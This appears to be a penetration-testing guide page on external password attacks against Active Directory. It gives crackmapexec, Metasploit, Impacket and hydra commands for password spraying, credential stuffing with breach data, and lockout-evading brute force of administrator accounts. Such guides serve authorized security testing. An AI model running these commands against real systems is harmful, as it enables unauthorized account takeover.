This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Non-Authenticated (External) Attacks

Password Spraying

Purpose: Test common passwords across multiple accounts while avoiding lockout thresholds.

Requirements: User list, common passwords, understanding of domain lockout policy

Attack Value: High success rate with common corporate passwords, provides initial domain access with minimal detection risk

Password Policy Discovery

# Extract domain password policy
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol

Password Spraying Execution

# SMB password spraying with delay
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success

# Multiple password attempts with lockout consideration
for password in "Password123!" "Welcome2024!" "Company123!"; do
    crackmapexec smb <DC-IP> -u users.txt -p "$password" --continue-on-success
    sleep 1800  # 30-minute delay between password attempts
done

Credential Stuffing

Purpose: Use compromised credentials from external breaches against domain authentication.

Requirements: Breach credential data matching target organization, network access to domain services

Attack Value: High success rate when breach data matches target organization, immediate domain compromise possible

Credential Preparation

# Process breach data for domain-specific attempts
grep "@<company>.com" breached_creds.txt | cut -d: -f1,2 > domain_creds.txt

Credential Stuffing Execution

CrackMapExec Method

# Test credential pairs without brute force permutation
crackmapexec smb <DC-IP> -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success

Metasploit Method

# Credential validation module
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
set USERPASS_FILE /path/to/domain_creds.txt
set STOP_ON_SUCCESS false
run

Brute Force Attacks

Purpose: Systematically attempt password combinations against specific high-value accounts.

Requirements: Target administrative accounts, comprehensive password lists, understanding of lockout policies

Attack Value: Direct administrative access upon success, complete system control possible

Targeted Brute Force

CrackMapExec Method

# Single account brute force with lockout avoidance
crackmapexec smb <DC-IP> -u 'administrator' -p passwords.txt --continue-on-success

# Time-delayed brute force for lockout evasion
for password in $(head -4 passwords.txt); do  # Test only 4 passwords per cycle
    crackmapexec smb <DC-IP> -u 'administrator' -p "$password"
    sleep 5
done
sleep 1800 # Wait 30 minutes before next cycle

Impacket Method

# Protocol-specific brute force
for password in $(cat admin_passwords.txt); do
    python3 psexec.py <domain>/administrator:"$password"@<DC-IP> 2>/dev/null
    if [ $? -eq 0 ]; then echo "SUCCESS: administrator:$password"; break; fi
    sleep 60
done

Metasploit Method

# Multi-protocol brute force
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/common_passwords.txt
set VERBOSE false
run

# RDP brute force for remote access
use auxiliary/scanner/rdp/rdp_login
set RHOSTS <target-IP>
set USERNAME administrator
set PASS_FILE /usr/share/wordlists/common_passwords.txt
run

Service-Specific Brute Force

# RDP brute force with hydra
hydra -l administrator -P passwords.txt rdp://<target-IP> -t 1 -w 30

# WinRM brute force
crackmapexec winrm <target-IP> -u 'administrator' -p passwords.txt
PreviousAuthentication AttacksNextAuthenticated (Post-Compsomise) Attacks

Last updated

Was this helpful?